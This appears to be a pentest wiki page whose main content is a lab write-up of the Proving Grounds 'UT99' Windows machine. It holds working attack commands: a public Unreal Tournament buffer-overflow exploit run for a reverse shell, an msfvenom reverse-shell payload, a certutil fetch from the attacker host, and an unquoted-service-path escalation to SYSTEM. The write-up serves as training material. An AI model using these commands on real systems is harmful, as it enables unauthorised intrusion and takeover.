Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page

Was this helpful?

  1. Writeups
  2. PG Practice
  3. Windows

UT99

Proving Grounds PG Practice ClamAV writeup

Nmap

sudo nmap 192.168.142.44 -p- -sS -sV                               

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          FileZilla ftpd
80/tcp   open  http         Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
443/tcp  open  ssl/http     Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
3306/tcp open  mysql        MySQL (unauthorized)
6660/tcp open  irc          InspIRCd
-
-
7000/tcp open  irc          InspIRCd
6673/tcp open  vision_elmd?
7001/tcp open  tcpwrapped
7005/tcp open  tcpwrapped
7007/tcp open  irc          InspIRCd
Service Info: Hosts: localhost, www.example.com, irc.madcowz.localdomain; 
OS: Windows; CPE: cpe:/o:microsoft:window

Whilst FTP open I was unable to connect successfully without valid credentials as shown below:

Trying the web server we see we are taken to the MadCowz website.

Running whatweb against the web server shows it is running Apache 2.4.16 on a 32-bit Windows host.

From here nothing else too interesting was found on the web sever by means of exploitation. MySQL login was also denied to my attacking machine.

However, we do have IRC open on a large range of ports 6660-7000,7007. Connecting to these ports with command line options was proving unreliable due to frequent disconnections. Installing HexChat proved much more successful.

sudo apt-get install hexchat

With HexChat open add a network and use the settings as per shown below. Ensuring the correct IP is set.

After doing so close the window and then connect to the new network. You should see a similar screen as below:

From here go to Server --> Channel List --> Perform a wildcard * search on the defaultsettings to find the channel #ut99.

This channel identifies the server is intended for Unreal Tournament 99 which we know is also running on Windows due to previous enumeration. Joining the channel also reveals the user Daisy.

Searching for Unreal Tournament 99 exploits for Windows on exploit-db shows the following:

After downloading the exploit code and looking through it we see the following usage example:

unreal_tournament-bof-win.pl <host> <query port> <reverse ip> <reverse port>

We know from the HexChat and Nmap enumeration that the server for UT99 is running on port 7778. I set up a netcat listener on my attacking machine to port 80. I then used the following command to connect to the target server.

perl ut99.pl 192.168.142.44 7778 192.168.49.142 80

Resulting in a reverse shell.

From here with standard enumeration we find the directory C:\ftp containing the following contents.

 Directory of c:\ftp

10/07/2015  06:21 AM    <DIR>          .
10/07/2015  06:21 AM    <DIR>          ..
10/07/2015  01:44 PM        35,984,520 FoxitReader706.1126_enu_Setup.exe
10/07/2015  04:46 AM        35,922,892 KB968930.msu
10/07/2015  01:45 PM       114,238,280 xampp-win32-5.6.12-0-VC11-installer.exe

The version of Foxit Reader shown 7.0.6.1126 appears to be vulnerable to an unquoted service path privilege escalation.

Checking installed software on the target system we can see Foxit Reader is installed.

 Directory of c:\Program Files (x86)

10/07/2015  04:04 AM    <DIR>          .
10/07/2015  04:04 AM    <DIR>          ..
11/02/2006  06:33 AM    <DIR>          Common Files
10/07/2015  04:04 AM    <DIR>          Foxit Software
10/03/2015  02:34 AM    <DIR>          InspIRCd
04/11/2009  09:30 AM    <DIR>          Internet Explorer
11/02/2006  08:05 AM    <DIR>          MSBuild
09/30/2015  11:12 PM    <DIR>          Mumble
11/02/2006  08:05 AM    <DIR>          Reference Assemblies
04/11/2009  09:30 AM    <DIR>          Windows Calendar
01/20/2008  08:09 PM    <DIR>          Windows Collaboration
01/20/2008  08:08 PM    <DIR>          Windows Defender
04/11/2009  09:30 AM    <DIR>          Windows Mail
04/11/2009  09:30 AM    <DIR>          Windows Media Player
11/02/2006  08:05 AM    <DIR>          Windows NT
04/11/2009  09:30 AM    <DIR>          Windows Photo Gallery
04/11/2009  09:30 AM    <DIR>          Windows Sidebar
               0 File(s)              0 bytes
              17 Dir(s)  13,051,826,176 bytes free

Querying the service on the target systems shows the service is running in the context of SYSTEM and the binary path indeed contains spaces and is not wrapped in quotes.

cmd:>sc qc FoxitCloudUpdateService

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FoxitCloudUpdateService
TYPE               : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE         : 2   AUTO_START
ERROR_CONTROL      : 1   NORMAL
BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP   : 
TAG                : 0
DISPLAY_NAME       : Foxit Cloud Safe Update Service
DEPENDENCIES       : 
SERVICE_START_NAME : LocalSystem

I then tested for write privileges in the binary path by creating a text file in the C:\Program Files (x86)\Foxit Software\Foxit Reader\ path.

echo Hello > test.txt

Checking the contents of the directory after doing so we see the test.txt file.

 Directory of c:\Program Files (x86)\Foxit Software\Foxit Reader

08/25/2021  12:35 PM    <DIR>          .
08/25/2021  12:35 PM    <DIR>          ..
11/26/2014  06:03 PM           385,248 64BitMailAgent.exe
10/07/2015  04:04 AM    <DIR>          Advertisement
10/07/2015  04:04 AM    <DIR>          docusign
10/07/2015  04:05 AM    <DIR>          Foxit Cloud
08/25/2021  12:32 PM             7,168 Foxit.exe
11/27/2014  10:24 AM        42,164,448 FoxitReader.exe
11/27/2014  03:49 PM            74,588 FoxitReader.exe.man
11/26/2014  06:03 PM         4,856,544 FoxitUpdater.exe
11/26/2014  07:15 PM         1,621,728 FXCUSTOM.dll
10/07/2015  04:04 AM    <DIR>          lex
08/28/2014  10:25 AM            27,076 notice.txt
10/07/2015  04:04 AM    <DIR>          plugins
10/07/2015  04:04 AM    <DIR>          Release Note
11/26/2014  06:03 PM         2,093,280 SendCrashReport.exe
10/07/2015  04:04 AM    <DIR>          Shell Extensions
10/07/2015  04:04 AM    <DIR>          Skins
10/07/2015  04:04 AM    <DIR>          stamps
10/07/2015  04:04 AM    <DIR>          Start
08/25/2021  12:35 PM                 8 test.txt '# Test file created'
11/26/2014  07:07 PM         2,302,176 TrackReview.exe
10/07/2015  04:05 AM           278,490 unins000.dat
10/07/2015  04:02 AM         1,479,392 unins000.exe
10/07/2015  04:05 AM            22,701 unins000.msg
11/18/2014  04:38 PM         2,004,704 UninstallPrint.exe
10/07/2015  04:05 AM             1,270 UpdaterInfo.xml
              15 File(s)     57,318,821 bytes
              12 Dir(s)  13,053,591,552 bytes free

I then performed a test reboot of the machine and confirmed that as the user Daisy I was able to reboot the machine. Currently this looks like we have a path to privilege escalation.

Firstly using msfvenom I created a stageless reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.142 LPORT=80 -f exe -o Foxit.exe

I then uploaded this to the directory C:\Program Files (x86)\Foxit Software\Foxit Reader\

certutil.exe -f -urlcache -split http://<IP>/Foxit.exe

After the upload was completed I started a netcat listener on my attacking machine then rebooted the target system.

shutdown.exe -r -f -t 1

Shortly after I was able to obtain privileges as SYSTEM.

Last updated 2 years ago

Was this helpful?

🚩
Unreal Tournament - Remote Buffer Overflow (SEH)Exploit Database
Logo
Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege EscalationExploit Database
Exploit Link
Logo